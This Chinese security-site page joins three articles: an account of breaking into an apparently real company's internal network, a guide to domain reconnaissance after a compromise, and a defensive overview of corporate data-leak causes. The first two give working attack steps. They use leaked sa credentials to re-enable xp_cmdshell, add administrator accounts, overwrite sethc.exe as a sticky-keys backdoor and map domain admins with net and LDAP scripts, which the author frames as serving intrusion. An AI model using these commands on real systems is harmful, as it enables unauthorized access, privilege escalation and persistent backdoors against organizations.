描述：对于内网渗透技术一直感觉很神秘，手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术！本文敏感信息以屏蔽！密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行，再通过自己的灵活思维运用。

环境：2003 SERVER
IIS ：6.0 支持php
数据库：MSSQL和MYSQL
网站类型：ASPX

本文重点讲述内网渗透提权部分，对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道，拿到webshell后服务器能否提权就要先找提权的漏洞所在。从本站的角度来看，存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录，很平常么。没现有SU和MYSQL之类的信息。

E：盘可以浏览
F：盘可以浏览

本站ASPX 类型网站，使用的是MSSQL数据库。显示密码不是最高权限的用户，就是是个DB用户提权也不能马上到手。

再翻翻别的站点，目录可以浏览一个个找吧。发现一个目录web.config有SA用户

连接数据库信息：

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****" 打开aspxspy，使用database连接功能。

登录成功，显示SA看来应该没有降权。

连接状态是MSSQL 2005，要先启xp_cmdshell.

接着执行下命令"whoami"

good，system 权限，下面就是添加一个账号了。。
Exec master.dbo.xp_cmdshell 'net user admin **** /add'

Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

再看下3389端口是否开启
Exec master.dbo.xp_cmdshell 'netstat -ano'

OK,状态正常。
Exec master.dbo.xp_cmdshell 'ipconfig /all'显示配置是内网IP

通过域名解析到的IP连接3389，可以连接。
说明管理做了端口映射，这就不要转发端口了。省了很多功夫！

这才拿到了一台服务器的权限，从网站的SQL连接上不难发现内网还有SQL服务器。

渗透继续……

内网IP为200，同样是MSSQL SA权限。

<add key="ConnectionString2" value="server=192.168.8.200;database=DB_CustomSMS;User=sa;PWD=*****"/>

再利用aspxspy 数据库连接，

郁闷的事情发生了，不能连接。
[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒绝访问。

按道理讲数据库能使用的情况下应该可以成功连接上的，难道没有配置TCP/IP访问数据库？疑问产生了，无耐之下通过3389上到服务器上来试试。服务器安装了MSSQL，有查询分析器和企业管理器。这又成了我们的工具。呵呵！
SQL分析器连接之，仍然无法连接。

先测试下所在的MSSQL服务器机器的存在性。

成功响应，说明服务器存在。
运行mstsc试着3389连接下，显示了一个xp的界面。比较郁闷耶。

试下名称解析服务。。。
点击浏览一看，这么多MSSQL服务器名还真不知道哪台是的。观察下发现200和IP200的机器有些相近。输入SA及密码。

成功返回查询窗口。试下xp_cmdshell

发现不存在，恢复之
Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')
OK！

执行命令"whoami",虽然XP不支持whoami命令。

exec xp_cmdshell 'net user 123 123 /add'

提示系统错误。不是没权限添加。。。。不明真像了。。。

思路：开了3389可以用sethc.exe 替换来。。。

exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'替换之？
问题又来了，提示磁盘文件不足。
利用xp_dirtree查看下C盘
EXEC MASTER..XP_dirtree 'c:',1,1

列出文件目录，删除一个数据库的备份
再执行exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'

提示一个文件被复制，说明成功。3389 5次shift未弹出。

再试下
exec xp_cmdshell 'net user 123 123 /add' 提示成功。原来开始是空间不足导致的系统错误啊。真像揭开！
exec xp_cmdshell 'net localgroup administrator 123 /add'

3389登录之。。
exec xp_cmdshell 'net user 123 /del'删除用户

内网还存在很多机器，此次渗透就此结束。。。

总结：内网从端口转发到外部连接，再从3389登录内部3389 跟跳板技术差不多。

相关文章

• 2010年01月6日 -- 域内网中的信息收集之一内网结构的探测
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2010年07月17日 -- 渗透某大型内网入侵过程
• 2010年05月5日 -- 搞内网的一个小技巧
• 2010年04月9日 -- 域中渗透积累
• 2010年03月1日 -- 内网渗透案例
• 2009年12月14日 -- 内网渗透中SSh的巧用
• 2009年11月20日 -- 内网渗透心得
• 2009年07月10日 -- 内网信息泄漏面面观
• 2007年11月16日 -- 高级内网渗透工具:Paris (创建VPN)

这期的专栏是我设定的题目，看够了注入，是不是想了解一下内网的入侵手法呢？做为出题人，自然要写一篇了。在各式各样大小不同的内网中，最常见的就 是域内 网了。其实域内网的入侵和我们平常的入侵手法在总体上来讲的逻辑也是一样，也是信息的收集、分析，找出薄弱点，然后击破，再综合归纳整理，最终拿到域管理 员的密码，算是大功告成。有了内网的第一台机器的权限后，如何收集信息，这是很关键的一步，这篇文章讲的就是域内网信息的收集的第一步。

图1（点击查看大图）

说起来，我们不是专业的组网人员，对内网的拓扑图能否通过第一台机器的IP、子网掩码、dns来划分出，真的是很困难。不过我向来认为这是不重要 的，我们是来搞破坏的，又不是帮它组建。不过想知道大体划分，可以用Advanced IP Address Calculator这个工具来分析一下。在内网中要知道内网的大体结构，几个命令就够了。第一个是ipconfig /all。我在本机搭建了一个域环境，运行得到结果如图1。 从图1中我们可以看到子网掩码、本机IP、网关和dns服务器是多少。你可以用这些数据结合Advanced IP Address Calculator这个工具来在脑子里画出一个大体结构，看看有几个子网呀，每个子网可能有多大等等，我认为不重要，略过。多数内网当中，很有可能 DNS服务器也就是其中的一台域服务器。另一个重要的命令就是net命令了，net view是可以看到本机所在的域约有多少台机器,net view /domain，可以看到有几个域，”net view /domain:域名“ 是看每个域中有多少台机器，net group "domain admins" /domain，是可以看到域管理员的名字，运气好的情况下是直接可以看到域服务器是哪一台，如图2所示。net group是看看把用户分了多少个组。在英文机器中，我们要看域管理员密码用的是 net group "domain admins" /domain，在非英文英器上你可能要把domain admins这个名字来换一下了，就要先用net group来看看哪一个可能是域管理员的组。

图2（点击查看大图）

以上关键探测的步骤是探测出域管理员的名字和域服务器的名字。探测域服务器是哪一台还有另几个办法，除了dns的名字和net group "domain admins" /domain这个命令外，另一个办法是net time /domain，因为域服务器一般也做时间服务器。不过除了用系统命令外，结合工具也是不错的办法。微软对域提供了专门的adsi（Active Directory）活动目录服务模型，其中在域用到的就是ADSI的接口之一LDAP提供者，用来管理域的。我们可以写一个很简短的vbs程序来探测出 域服务器是哪一台，1.vbs代码如下： ★ set obj=GetObject("LDAP://rootDSE") wscript.echo obj.servername ★ 运行后的结果如图3所示。

图3（点击查看大图）

收集的到这些信息够了吗？当然不足够，所以我们还要继续收集。http://www.rlmueller.net这 个网站是有很多专门针对域的vbs，我精选挑选了两个，还做了一下改动，让它更适应我们的入侵。第一个是DocumentProperties.vbs， 代码太长我就不列了，直接来看运行示例。第一个是cscript DocumentProperties.vbs LDAP://dc=gethash,dc=cn，你会得太多的信息了，在图4、图5中我没有办法截全图，大家运行一下就清楚了。大家可能会想我为什么会 用LDAP://dc=gethash,dc=cn这个，这串从哪来的，其实就是在图3中我写的那两句小代码1.vbs来得到的。当然你也可以具体到看具 体用户像LDAP://cn=TestUser,ou=Sales,dc=MyDomain,dc=com这样的一串，表示在MyDomain这个域中里 边的Sales部门里的TestUser用户是什么样的具体信息。

图4（点击查看大图）

图5（点击查看大图）

我们再用DocumentProperties.vbs来举两例，用它也直接可以探测本机信息的。第一个是cscript DocumentProperties.vbs WinNT://./administrator，查看本机administrator的信息，看一下密码长度呀，多久过期等。如果你看到可能一两天就要 过期了，表示它肯定要来修改密码了，这时你就想到要丢一下记录密码的东东上去了。再来一个是cscript DocumentProperties.vbs WinNT://./Themes,service，来查看Themes服务的相关信息，可以看到路径、启动方式，和帐号的启动方式等，分别示例如图6、 图7。

图6（点击查看大图）

图7（点击查看大图）

这个DocumentProperties.vbs最大的好处是不需要太多的权限，普通域用户的权限就够了。还有一个vbs是 Inventory2.vbs，这个我在内网中试过，好像需要域管理员权限。不过这个脚本虽然权限需要高一低，但是也有好处，直接运行就可以，不像上一个 DocumentProperties.vbs需要你对域知识有相关一些概念。由于这个脚本它原来的要调用excel组件，而且还会弹出ie对话框，我花 了一点时间修改了一下，可以直接保存成html了，无声无息且方便用于入侵,也不需要提供什么excel组件了，系统默认都支持的。由于在程序中我用的是 数组pc(65535,10)，如果内网过大（>65535?，呵呵）请小心使用。直接运行后，它的结果如图8所示，它会列出域中每一台机器的系统 版本、充担什么重要角色，打的补丁号等等。

图8（点击查看大图）

说实话，我虽然对域内网有过入侵经验，但毕竟没有亲自组过域内网，很多专业名词我也没有去查专业字典，只是凭自己理解写出来，所以写起来如果有不严谨的地方，希望读者指出，我们下一期再继续内网入侵之旅。

相关文章

• 2010年07月17日 -- MSSQL 入侵提权之内网渗透案例分析
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2010年07月17日 -- 渗透某大型内网入侵过程
• 2010年05月5日 -- 搞内网的一个小技巧
• 2010年04月9日 -- 域中渗透积累
• 2010年03月1日 -- 内网渗透案例
• 2009年12月14日 -- 内网渗透中SSh的巧用
• 2009年11月20日 -- 内网渗透心得
• 2009年07月10日 -- 内网信息泄漏面面观
• 2007年11月16日 -- 高级内网渗透工具:Paris (创建VPN)

1）出于业务需要，我们往往需要带着笔记本电脑/移动存储介质出差，但常常会遇到笔记本电脑/存储介质丢失等情况，造成敏感信息的丢失，给公司或单位带来巨大损失；

2）我们在做保密检查时，常常会发现被检查机器上存在不该有的机密文档，我们不知道这些数据他们是怎么获得的，又是通过什么渠道什么方式得到的；

3）在实际工作中，我们时常会碰到，某某员工在离职或和公司发生劳动纠纷后，将公司重要的机密文件带走，泄漏给的竞争对手，主动泄密相比于信息盗窃，更加防不胜防。

据联邦贸易委员会的一份报告显示， 在2005年，由于身份失窃所提交的报告占所有投诉报告总数的1/3左右，达25.5万份之多，高居去年联邦贸易委员会接到的诈骗投诉之首，而其中大部分失窃的身份信息是由于笔记本电脑的丢失引起的。

销售电脑保险的公司 Safeware Insurance公司 指出，2003年全美发生的笔记本电脑遗失案件高达60万起，而根据寻回电脑工具供应商 Absolute Software 提供的信息，这个数字去年更攀升至75万。

根据美国联邦贸易委员会(FTC)最近发表的调查报告显示，去年ID theft的受害人数达1000万人，占美国人口的4.6%。在损失额方面，消费者为50亿美元，企业及金融机构的损失额超过480亿美元。

据美国联邦调查局CSI/FBI2006年发布的《计算机犯罪与安全调查报告》，信息失窃事件已经越居第三，笔记本电脑丢失排名第六，其中还不包括排名第一的计算机病毒所携带的信息盗窃行为，现如今熊猫烧香病毒和灰鸽子等形成的地下产业链足以让我们触目惊心，信息保密战形势相当严峻。

经过分析，我们认为当前造成信息失窃的主要原因来自以下四个方面：信息盗窃（偷走）、信息丢失（丢失）、主动泄密（带走）、交叉感染（粗心）。

信息盗窃

信息盗窃与个人信息泄漏不同，它专指通过非法手段获取信息并进行恶意利用的犯罪行为，也是我们目前遇到最多也是最难对付的一种信息失窃行为，是造成我们内网信息安全这么严重最为突出的因素。信息盗窃动机主要来自：获取机密或敏感数据的访问权、窃取钱物或服务，主要表现形式：

1、 通过已构建好的网络途径发动入侵，渗透对方主机，盗取他人数据；

2、 通过监视网络传输内容，盗窃传输数据；

3、 通过在对方主机上植入木马或后门程序，截取对方屏幕、复制文件内容、盗窃敏感数据；

4、 当移动存储设备插入被控制的主机上，窃走里面存储的数据；

5、 趁他人不注意，将他人机器上或移动存储介质上的数据偷偷拷下；

6、 不排除直接盗取存有数据的存储设备，如笔记本电脑、主机硬盘、移动存储介质、光盘。

信息丢失

由于存储设备、介质丢失而引起信息丢失，造成信息泄漏，特别是在计算机日益普及的今天，这些现象越发突出，这种事件的发生存在许多不可预知性，即使我们的安全管理再完善、个人安全意识再高，他在特定的情况下同样失效。主要表现形式:

1、在家中、火车、汽车、机场、宾馆、公共场所、会场发生财产盗窃，导致笔记本丢失/移动存储设备丢失，造成信息丢失，形成泄密事件。

2、由于工作人员的疏忽大意，忘记将存储有重要信息的笔记本电脑/存储介质/文件携带或删除，造成他人能够获得该重要文件，导致信息丢失，如将笔记本电脑丢在宾馆里、将文件留在他人机器上，忘记删除销毁等。

主动泄密

主动泄密是指工作人员故意泄漏数据，属于主动泄密。相比于信息盗窃，主动泄密更加防不胜防。为“防止网络泄密”，自２００１年以来，国家已针对计算机技术、网络技术和网上综合信息传输技术发展的新特点，加大了保密技术的防范、检查和管理等基础知识培训，但目前还没有行之有效的主动泄密解决方案。

造成主动泄密的主要原因来自：

1、内部员工离职或与公司发生劳动纠纷而将重要文件带走

2、利益驱使内部员工将公司重要的商业机密透入给竞争对手

3、 企业信息管理不善，导致内部员工能够接触到企业敏感的业务数据或敏感信息，没有做分级分权细化处理

4、目前还没有有效的技术手段来防范企业内部员工的主动信息泄密行为

5、相关信息保密制度和惩罚措施滞后，责任不到位、法制观念淡薄、员工考核机制落后、缺乏流程化管理是造成员工会主动泄密的客观因素。

6、其他因素

主要表现形式：

1、由于各种原因，信息保管员通过各种渠道（设备、接口、网络、打印）将敏感数据泄漏出去，给公司带来重大损失。这种类型的信息泄密对于我们目前来说是很难防范的，因为信息保管员有权限直接接触这些机密的数据，我们唯一要做的是怎么来分散他的操作权限和定位他的保密责任；

2、 内部办公人员通过非法渠道从他人获得保密数据，并将它泄漏出去。这种主动泄漏才是我们工作的重点，也是我们需要下大力气来解决的，因为他会给我们带来责任定位不清的问题，最终导致怨案错案的发生，导致保密条例无法真正落实。

交叉感染

交叉感染也容易带来信息泄漏，它属于无意识的信息泄密。我们知道，信息在流转过程中，需要经过很多环节，中间会有很多人对他进行操作，当一个文件被创建后，往往会通过网络或是存储设备将数据传递到其他地方，如果保护措施不到位，极易被不该看的人看见，导致信息泄漏。主要表现在：

1、一机多用户引发数据交叉感染，数据都存储在共享的硬盘上，加上操作没有采取强制访问控制措施，其他用户能够接触到保密数据，无法保障各用户文件的安全，给别有用心的用户可乘之机。

2、 移动存储设备引发数据交叉感染，当文件或数据拷贝到移动存储设备上，如笔记本电脑、USB，这些设备在借用、维修、外出办公过程中，极易被他人偷走。

3、剩磁效应引发数据交叉感染，采用特殊的文件恢复工具将删除的文件恢复过来，从而被其他用户获取，导致信息泄漏。

相关文章

• 2010年07月17日 -- MSSQL 入侵提权之内网渗透案例分析
• 2010年01月6日 -- 域内网中的信息收集之一内网结构的探测